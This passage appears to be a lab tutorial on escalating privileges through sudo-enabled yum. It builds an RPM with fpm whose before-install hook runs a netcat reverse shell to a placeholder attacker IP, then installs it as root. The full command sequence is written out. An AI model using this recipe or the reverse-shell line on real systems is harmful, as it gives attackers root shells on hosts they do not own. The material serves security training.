Further examples around yum can also be found on gtfobins.
In order to leverage this vector the user must be able to execute yum commands as a higher privileged user, i.e. root.
A working example of this exploit can be found in the daily bugle room on tryhackme.
In the following section, I will cover packaging a reverse shell into an RPM using fpm.
The example below creates a package that includes a before-install trigger with an arbitrary script that can be defined by the attacker. When installed, this package will execute the arbitrary command. I've used a simple reverse netcat shell example for demonstration but this can be changed as necessary.
EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR
Using the above example and assuming yum can be executed as a higher-privileged user.
- Transfer the rpm to the host
- Start a listener on your local host such as the example netcat listener
- Install the vulnerable package
yum localinstall -y exploited-1.0-1.noarch.rpm